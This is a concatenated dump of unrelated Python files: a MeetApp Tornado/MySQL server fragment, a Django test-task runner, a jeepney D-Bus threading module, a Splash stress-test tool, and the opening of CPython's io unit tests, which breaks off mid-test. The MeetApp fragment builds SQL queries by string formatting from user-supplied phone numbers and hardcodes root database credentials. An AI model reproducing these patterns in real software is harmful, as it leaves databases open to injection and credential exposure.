return self.cursor.fetchone()
def fetchall(self):
return self.cursor.fetchall()
#### Helper functions ####
def phoneNumberFormatter(number): # Phone number string cleaner
number = str(number)
number = number.replace(" ","")
number = number.replace(")","")
number = number.replace("(","")
number = number.replace("-","")
number = number.replace("_","")
return number
def getMsgExpiryDate(datetime): # store_and_fwd expiry calculator
try:
datetime = datetime.replace(month=(datetime.month+1))
except:
datetime = datetime.replace(year=datetime.year+1,month=1)
return datetime.strftime("%d/%m/%y %H:%M:%S")
def reasignAutoIncrementOfStoreAndFwd(): # auto_increment maintainer
db.execute("use meetapp_server")
db.execute("alter table store_and_fwd_table drop _id")
db.execute("alter table store_and_fwd_table auto_increment=1")
db.execute("alter table store_and_fwd_table add _id BIGINT NOT NULL AUTO_INCREMENT PRIMARY KEY FIRST")
#con.commit()
def reasignAutoIncrementOfRegistrationTable():
db.execute("use meetapp_server")
db.execute("alter table registration_table drop _id")
db.execute("alter table registration_table auto_increment=1")
db.execute("alter table registration_table add _id BIGINT NOT NULL AUTO_INCREMENT PRIMARY KEY FIRST")
def getFullRegisteredNumberFrom(number): # Gives country_code + number for given only number
number = str(number[-10:])
db.execute("use meetapp_server")
db.execute("select registered_number from registration_table where registered_number like '%{}%'".format(str(number)))
result = db.fetchone()
if USE_PYMYSQL:
result = result['registered_number']
if DEBUG:
print "NUMBER: " + str(number)
print "RESULT: " + str(result)
try:
return result[0]
except:
return None
def getFCMIdOfUser(number):
number = phoneNumberFormatter(number)
db.execute("use meetapp_server")
db.execute("select fcm_token from registration_table where registered_number=%s" % number)
result = db.fetchone()
try:
if USE_PYMYSQL:
return result['fcm_token']
else:
return result[0]
except Exception as q:
raise q
#### Main program ####
### Database connection ###
try:
if not USE_PYMYSQL:
print "Using MySQLdb..."
#con = mdb.connect("localhost",DB_USER,DB_PASSWD)
#con.ping(True)
#db = con.cursor()
db = MeetAppDatabase()
else:
print "Using PyMySQL..."
con = pymysql.connect(host="localhost",
user="root",
password="linux",
db="meetapp_server",
charset="utf8mb4",
cursorclass=pymysql.cursors.DictCursor)
db = con.cursor()
except Exception as e:
raise e
sys.exit("Error connecting MySQL database")
### FCM Push service ###
try:
fcm = FCMNotification(api_key=FCM_KEY)
except Exception as e:
raise e
Sys.exit("Failed to init FCM PUSH SERVICE")
app = tornado.web.Application([
(r'/',WSHandler),
])
if __name__ == "__main__":
try:
os.system("clear")
### Security constructor ###
aes = MeetAppSecurity()
print "\n\r[ MeetApp ]"
print "Started at: " + time.strftime("%d/%m/%y %I:%M:%S %p")
print "IP Address: " + str(os.popen("hostname -I").read())
if USE_PYMYSQL:
print "Using PyMySQL..."
else:
print "Using MySQLdb..."
initDB()
reasignAutoIncrementOfStoreAndFwd()
reasignAutoIncrementOfRegistrationTable()
try:
http_server = tornado.httpserver.HTTPServer(app)
http_server.listen(PORT)
myIP = socket.gethostbyname(socket.gethostname())
print "Starting tornado socket server at %s:%s\n" % (str(os.popen("hostname -I").read().replace('\n','')),PORT)
tornado.ioloop.IOLoop.instance().start()
except Exception as e:
raise e
sys.exit("\noops! Tornado exception occured!")
except(KeyboardInterrupt):
sys.exit("KeyboardInterrupt.. exiting..")
|
task_thread.py
|
import os
import json
import threading
import time
from time import sleep
from xml.dom.minidom import parse
from backend.settings import BASE_DIR
from app_api.models import TestCase, TestTask, TaskCaseRelevance, TestResult
from app_api.tasks import running
# 测试数据文件
DATA_FILE_PATH = os.path.join(BASE_DIR, "app_api", "data", "test_data.json")
# 测试报告文件
REPORT_PATH = os.path.join(BASE_DIR, "app_api", "data", "report.xml")
class TaskThread:
def __init__(self, task_id, cases):
self.tid = task_id
self.cases = cases
def run_cases(self):
# 1. 读取测试用例,写入测试文件表
print("1. 读取测试用例,写入测试文件")
cases_dict = {}
for case in self.cases:
case = TestCase.objects.get(id=case)
cases_dict["case" + str(case.id)] = {
"url": case.url,
"method": case.method,
"header": case.header,
"params_type": case.params_type,
"params_body": case.params_body,
"assert_type": case.assert_type,
"assert_text": case.assert_text
}
cases_json = json.dumps(cases_dict)
with(open(DATA_FILE_PATH, "w")) as f:
f.write(cases_json)
# 3.执行运行测试用例的文件, 它会生成 result.xml 文件
print("3.运行用例前---》", time.ctime())
running.delay()
# os.system()
print("3.运行用例后---》", time.ctime())
# 4. 读取report.xml文件,把这里面的结果放到表里面。
print("4. 读取report.xml文件")
self.save_result()
print("4. 保存完成")
# 5. 任务->已执行
print("5.任务->已执行")
TestTask.objects.select_for_update().filter(id=self.tid).update(status=2)
def save_result(self):
"""
保存测试结果到数据库
"""
# 打开xml文档
dom = parse(REPORT_PATH)
# 得到文档元素对象
root = dom.documentElement
# 获取(一组)标签
testsuite = root.getElementsByTagName('testsuite')
errors = testsuite[0].getAttribute("errors")
failures = testsuite[0].getAttribute("failures")
name = testsuite[0].getAttribute("name")
skipped = testsuite[0].getAttribute("skipped")
tests = testsuite[0].getAttribute("tests")
run_time = testsuite[0].getAttribute("time")
f = open(REPORT_PATH, "r", encoding="utf-8")
result = f.read()
f.close()
TestResult.objects.create(
task_id=self.tid,
name=name,
error=int(errors),
failure=int(failures),
skipped=int(skipped),
tests=int(tests),
run_time=float(run_time),
result=result
)
def run_tasks(self):
print("创建线程任务...")
sleep(2)
threads = []
t1 = threading.Thread(target=self.run_cases)
threads.append(t1)
for t in threads:
t.start()
for t in threads:
t.join()
def run(self):
threads = []
t = threading.Thread(target=self.run_tasks)
threads.append(t)
for t in threads:
t.start()
if __name__ == '__main__':
print("开始")
# run() # 丢给线程去运行任务
TaskThread(1, [1, 2]).run()
print("结束")
#上班 ....
#(下班)接孩子
|
threading.py
|
"""Synchronous IO wrappers with thread safety
"""
from concurrent.futures import Future
from contextlib import contextmanager
import functools
import os
from selectors import EVENT_READ
import socket
from queue import Queue, Full as QueueFull
from threading import Lock, Thread
from typing import Optional
from jeepney import Message, MessageType
from jeepney.bus import get_bus
from jeepney.bus_messages import message_bus
from jeepney.wrappers import ProxyBase, unwrap_msg
from .blocking import (
unwrap_read, prep_socket, DBusConnectionBase, timeout_to_deadline,
)
from .common import (
MessageFilters, FilterHandle, ReplyMatcher, RouterClosed, check_replyable,
)
__all__ = [
'open_dbus_connection',
'open_dbus_router',
'DBusConnection',
'DBusRouter',
'Proxy',
'ReceiveStopped',
]
class ReceiveStopped(Exception):
pass
class DBusConnection(DBusConnectionBase):
def __init__(self, sock: socket.socket, enable_fds=False):
super().__init__(sock, enable_fds=enable_fds)
self._stop_r, self._stop_w = os.pipe()
self.stop_key = self.selector.register(self._stop_r, EVENT_READ)
self.send_lock = Lock()
self.rcv_lock = Lock()
def send(self, message: Message, serial=None):
"""Serialise and send a :class:`~.Message` object"""
data, fds = self._serialise(message, serial)
with self.send_lock:
if fds:
self._send_with_fds(data, fds)
else:
self.sock.sendall(data)
def receive(self, *, timeout=None) -> Message:
"""Return the next available message from the connection
If the data is ready, this will return immediately, even if timeout<=0.
Otherwise, it will wait for up to timeout seconds, or indefinitely if
timeout is None. If no message comes in time, it raises TimeoutError.
If the connection is closed from another thread, this will raise
ReceiveStopped.
"""
deadline = timeout_to_deadline(timeout)
if not self.rcv_lock.acquire(timeout=(timeout or -1)):
raise TimeoutError(f"Did not get receive lock in {timeout} seconds")
try:
return self._receive(deadline)
finally:
self.rcv_lock.release()
def _read_some_data(self, timeout=None):
# Wait for data or a signal on the stop pipe
for key, ev in self.selector.select(timeout):
if key == self.select_key:
if self.enable_fds:
return self._read_with_fds()
else:
return unwrap_read(self.sock.recv(4096)), []
elif key == self.stop_key:
raise ReceiveStopped("DBus receive stopped from another thread")
raise TimeoutError
def interrupt(self):
"""Make any threads waiting for a message raise ReceiveStopped"""
os.write(self._stop_w, b'a')
def reset_interrupt(self):
"""Allow calls to .receive() again after .interrupt()
To avoid race conditions, you should typically wait for threads to
respond (e.g. by joining them) between interrupting and resetting.
"""
# Clear any data on the stop pipe
while (self.stop_key, EVENT_READ) in self.selector.select(timeout=0):
os.read(self._stop_r, 1024)
def close(self):
"""Close the connection"""
self.interrupt()
super().close()
def open_dbus_connection(bus='SESSION', enable_fds=False, auth_timeout=1.):
"""Open a plain D-Bus connection
D-Bus has an authentication step before sending or receiving messages.
This takes < 1 ms in normal operation, but there is a timeout so that client
code won't get stuck if the server doesn't reply. *auth_timeout* configures
this timeout in seconds.
:return: :class:`DBusConnection`
"""
bus_addr = get_bus(bus)
sock = prep_socket(bus_addr, enable_fds, timeout=auth_timeout)
conn = DBusConnection(sock, enable_fds)
with DBusRouter(conn) as router:
reply_body = Proxy(message_bus, router, timeout=10).Hello()
conn.unique_name = reply_body[0]
return conn
class DBusRouter:
"""A client D-Bus connection which can wait for replies.
This runs a separate receiver thread and dispatches received messages.
It's possible to wrap a :class:`DBusConnection` in a router temporarily.
Using the connection directly while it is wrapped is not supported,
but you can use it again after the router is closed.
"""
def __init__(self, conn: DBusConnection):
self.conn = conn
self._replies = ReplyMatcher()
self._filters = MessageFilters()
self._rcv_thread = Thread(target=self._receiver, daemon=True)
self._rcv_thread.start()
@property
def unique_name(self):
return self.conn.unique_name
def send(self, message, *, serial=None):
"""Serialise and send a :class:`~.Message` object"""
self.conn.send(message, serial=serial)
def send_and_get_reply(self, msg: Message, *, timeout=None) -> Message:
"""Send a method call message, wait for and return a reply"""
check_replyable(msg)
if not self._rcv_thread.is_alive():
raise RouterClosed("This D-Bus router has stopped")
serial = next(self.conn.outgoing_serial)
with self._replies.catch(serial, Future()) as reply_fut:
self.conn.send(msg, serial=serial)
return reply_fut.result(timeout=timeout)
def close(self):
"""Close this router
This does not close the underlying connection.
"""
self.conn.interrupt()
self._rcv_thread.join(timeout=10)
self.conn.reset_interrupt()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
return False
def filter(self, rule, *, queue: Optional[Queue] =None, bufsize=1):
"""Create a filter for incoming messages
Usage::
with router.filter(rule) as queue:
matching_msg = queue.get()
:param jeepney.MatchRule rule: Catch messages matching this rule
:param queue.Queue queue: Matched messages will be added to this
:param int bufsize: If no queue is passed in, create one with this size
"""
return FilterHandle(self._filters, rule, queue or Queue(maxsize=bufsize))
# Code to run in receiver thread ------------------------------------
def _dispatch(self, msg: Message):
if self._replies.dispatch(msg):
return
for filter in self._filters.matches(msg):
try:
filter.queue.put_nowait(msg)
except QueueFull:
pass
def _receiver(self):
try:
while True:
msg = self.conn.receive()
self._dispatch(msg)
except ReceiveStopped:
pass
finally:
# Send errors to any tasks still waiting for a message.
self._replies.drop_all()
class Proxy(ProxyBase):
"""A blocking proxy for calling D-Bus methods via a :class:`DBusRouter`.
You can call methods on the proxy object, such as ``bus_proxy.Hello()``
to make a method call over D-Bus and wait for a reply. It will either
return a tuple of returned data, or raise :exc:`.DBusErrorResponse`.
The methods available are defined by the message generator you wrap.
You can set a time limit on a call by passing ``_timeout=`` in the method
call, or set a default when creating the proxy. The ``_timeout`` argument
is not passed to the message generator.
All timeouts are in seconds, and :exc:`TimeoutErrror` is raised if it
expires before a reply arrives.
:param msggen: A message generator object
:param ~threading.DBusRouter router: Router to send and receive messages
:param float timeout: Default seconds to wait for a reply, or None for no limit
"""
def __init__(self, msggen, router, *, timeout=None):
super().__init__(msggen)
self._router = router
self._timeout = timeout
def __repr__(self):
extra = '' if (self._timeout is None) else f', timeout={self._timeout}'
return f"Proxy({self._msggen}, {self._router}{extra})"
def _method_call(self, make_msg):
@functools.wraps(make_msg)
def inner(*args, **kwargs):
timeout = kwargs.pop('_timeout', self._timeout)
msg = make_msg(*args, **kwargs)
assert msg.header.message_type is MessageType.method_call
reply = self._router.send_and_get_reply(msg, timeout=timeout)
return unwrap_msg(reply)
return inner
@contextmanager
def open_dbus_router(bus='SESSION', enable_fds=False):
"""Open a D-Bus 'router' to send and receive messages.
Use as a context manager::
with open_dbus_router() as router:
...
On leaving the ``with`` block, the connection will be closed.
:param str bus: 'SESSION' or 'SYSTEM' or a supported address.
:param bool enable_fds: Whether to enable passing file descriptors.
:return: :class:`DBusRouter`
"""
with open_dbus_connection(bus=bus, enable_fds=enable_fds) as conn:
with DBusRouter(conn) as router:
yield router
|
stress.py
|
import sys, random, optparse, time, json
from itertools import islice
from threading import Thread
from collections import Counter
from queue import Queue
import requests
from .utils import SplashServer, MockServer
class StressTest():
def __init__(self, reqs, host="localhost:8050", requests=1000, concurrency=50, shuffle=False, verbose=False):
self.reqs = reqs
self.host = host
self.requests = requests
self.concurrency = concurrency
self.shuffle = shuffle
self.verbose = verbose
def run(self):
args = list(islice(self.reqs, self.requests))
if self.shuffle:
random.shuffle(args)
print("Total requests: %d" % len(args))
print("Concurrency : %d" % self.concurrency)
starttime = time.time()
q, p = Queue(), Queue()
for _ in range(self.concurrency):
t = Thread(target=worker, args=(self.host, q, p, self.verbose))
t.daemon = True
t.start()
for a in args:
q.put(a)
q.join()
outputs = []
for _ in range(self.requests):
outputs.append(p.get())
elapsed = time.time() - starttime
print()
print("Total requests: %d" % len(args))
print("Concurrency : %d" % self.concurrency)
print("Elapsed time : %.3fs" % elapsed)
print("Avg time p/req: %.3fs" % (elapsed/len(args)))
print("Received (per status code or error):")
for c, n in Counter(outputs).items():
print(" %s: %d" % (c, n))
def worker(host, q, p, verbose=False):
url = "http://%s/render.html" % host
while True:
try:
args = q.get()
t = time.time()
r = requests.get(url, params=args)
t = time.time() - t
p.put(r.status_code)
if verbose:
print(". %d %.3fs %s" % (r.status_code, t, args))
else:
sys.stdout.write(".")
sys.stdout.flush()
except Exception as e:
p.put(type(e))
if verbose:
print("E %.3fs %s" % (t, args))
else:
sys.stdout.write("E")
sys.stdout.flush()
finally:
q.task_done()
class MockArgs(object):
ok_urls = 0.5
error_urls = 0.3
timeout_urls = 0.2
def __init__(self, requests=1000):
self.requests = requests
def _ok_urls(self):
url = ["http://localhost:8998/jsrender"]
return int(self.requests * self.ok_urls) * url
def _error_urls(self):
url = ["http://non-existent-host/"]
return int(self.requests * self.error_urls) * url
def _timeout_urls(self):
url = ["http://localhost:8998/delay?n=10&timeout=0.5"]
return int(self.requests * self.timeout_urls) * url
def __iter__(self):
ok_urls = self._ok_urls()
error_urls = self._error_urls()
timeout_urls = self._timeout_urls()
print("Expected codes: HTTP200x%d, HTTP502x%d, HTTP504x%d" % (
len(ok_urls), len(error_urls), len(timeout_urls)))
urls = ok_urls + error_urls + timeout_urls
return ({"url": x} for x in urls)
class ArgsFromUrlFile(object):
def __init__(self, urlfile):
self.urlfile = urlfile
def __iter__(self):
for line in open(self.urlfile):
url = line.rstrip()
if '://' not in url:
url = 'http://' + url
yield {"url": url, "timeout": 60}
class ArgsFromLogfile(object):
def __init__(self, logfile):
self.logfile = logfile
def __iter__(self):
for l in open(self.logfile):
if "[stats]" in l:
d = json.loads(l[33:].rstrip())
yield d['args']
def lua_runonce(script, timeout=60., splash_args=None, **kwargs):
""" Start splash server, execute lua script in it and return the output.
:type script: str
:param script: Script to be executed.
:type timeout: float
:param timeout: Timeout value for the execution request.
:param splash_args: Extra parameters for splash server invocation.
:type kwargs: dict
:param kwargs: Any other parameters are passed as arguments to the request
and will be available via ``splash.args``.
This function also starts a `MockServer`. If `url` kwarg has scheme=mock,
e.g., "mock://jsrender", it will be resolved as a url pointing to
corresponding mock server resource.
"""
if splash_args is None:
splash_args = ['--disable-lua-sandbox',
'--allowed-schemes=file,http,https', ]
with SplashServer(extra_args=splash_args) as s, MockServer() as ms:
if kwargs.get('url', '').startswith('mock://'):
kwargs['url'] = ms.url(kwargs['url'][7:])
params = {'lua_source': script}
params.update(kwargs)
resp = requests.get(s.url('execute'), params=params, timeout=timeout)
if resp.ok:
return resp.content
else:
raise RuntimeError(resp.text)
def benchmark_png(url, viewport=None, wait=0.5, render_all=1,
width=None, height=None, nrepeats=3, timeout=60.):
f = """
function main(splash)
local resp, err = splash:go(splash.args.url)
assert(resp, err)
assert(splash:wait(tonumber(splash.args.wait)))
-- if viewport is 'full' it should be set only after waiting
if splash.args.viewport ~= nil and splash.args.viewport ~= "full" then
local w, h = string.match(splash.args.viewport, '^(%d+)x(%d+)')
if w == nil or h == nil then
error('Invalid viewport size format: ' .. splash.args.viewport)
end
splash:set_viewport_size(tonumber(w), tonumber(h))
end
local susage = splash:get_perf_stats()
local nrepeats = tonumber(splash.args.nrepeats)
local render_all = splash.args.render_all or splash.args.viewport == 'full'
local png, err
for i = 1, nrepeats do
png, err = splash:png{width=splash.args.width,
height=splash.args.height,
render_all=render_all}
assert(png, err)
end
local eusage = splash:get_perf_stats()
return {
wallclock_secs=(eusage.walltime - susage.walltime) / nrepeats,
maxrss=eusage.maxrss,
cpu_secs=(eusage.cputime - susage.cputime) / nrepeats,
png=png,
}
end
"""
return json.loads(lua_runonce(
f, url=url, width=width, height=height, render_all=render_all,
nrepeats=nrepeats, wait=wait, viewport=viewport, timeout=timeout))
def parse_opts():
op = optparse.OptionParser()
op.add_option("-H", dest="host", default="localhost:8050",
help="splash hostname & port (default: %default)")
op.add_option("-u", dest="urlfile", metavar="FILE",
help="read urls from FILE instead of using mock server ones")
op.add_option("-l", dest="logfile", metavar="FILE",
help="read urls from splash log file (useful for replaying)")
op.add_option("-s", dest="shuffle", action="store_true", default=False,
help="shuffle (randomize) requests (default: %default)")
op.add_option("-v", dest="verbose", action="store_true", default=False,
help="verbose mode (default: %default)")
op.add_option("-c", dest="concurrency", type="int", default=50,
help="concurrency (default: %default)")
op.add_option("-n", dest="requests", type="int", default=1000,
help="number of requests (default: %default)")
return op.parse_args()
def main():
opts, _ = parse_opts()
if opts.urlfile:
urls = ArgsFromUrlFile(opts.urlfile)
elif opts.logfile:
urls = ArgsFromLogfile(opts.logfile)
else:
urls = MockArgs(opts.requests)
t = StressTest(urls, opts.host, opts.requests, opts.concurrency, opts.shuffle, opts.verbose)
t.run()
if __name__ == "__main__":
main()
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import sysconfig
import threading
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import assert_python_ok, run_python_until_end
from test.support import FakePath
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array("b", bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast("B")[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
_cflags = sysconfig.get_config_var('CFLAGS') or ''
_config_args = sysconfig.get_config_var('CONFIG_ARGS') or ''
MEMORY_SANITIZER = (
'-fsanitize=memory' in _cflags or
'--with-memory-sanitizer' in _config_args
)
# Does io.IOBase finalizer log the exception if the close() method fails?
# The exception is ignored silently by default in release build.
IOBASE_EMITS_UNRAISABLE = (hasattr(sys, "gettotalrefcount") or sys.flags.dev_mode)
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class SlowFlushRawIO(MockRawIO):
def __init__(self):
super().__init__()
self.in_flush = threading.Event()
def flush(self):
self.in_flush.set()
time.sleep(0.25)
class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase):
pass
class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
def truncate(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence=0):
# naive implementation, enough for tests
return 0
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b"hello")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest("no largefile support")
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_optional_abilities(self):
# Test for OSError when optional APIs are not supported
# The purpose of this test is to try fileno(), reading, writing and
# seeking operations with various objects that indicate they do not
# support these operations.
def pipe_reader():
[r, w] = os.pipe()
os.close(w) # So that read() is harmless
return self.FileIO(r, "r")
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
# Guarantee that we can write into the pipe without blocking
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, "w")
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(),
self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), "ascii")
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), "ascii")
tests = (
(pipe_reader, "fr"), (pipe_writer, "fw"),
(buffered_reader, "r"), (buffered_writer, "w"),
(buffered_random, "rws"), (buffered_rw_pair, "rw"),
(text_reader, "r"), (text_writer, "w"),
(self.BytesIO, "rws"), (self.StringIO, "rws"),
)
for [test, abilities] in tests:
with self.subTest(test), test() as obj:
if sys.platform == 'OpenVMS' and test in (pipe_reader, pipe_writer):
# Pipes are not a real pipes on OpenVMS
continue
readable = "r" in abilities
self.assertEqual(obj.readable(), readable)
writable = "w" in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = "3"
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b"3"
else:
self.fail("Unknown base class")
if "f" in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith("win") and test in (
pipe_reader, pipe_writer):
# Pipes seem to appear as seekable on Windows ans OpenVMS
continue
seekable = "s" in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
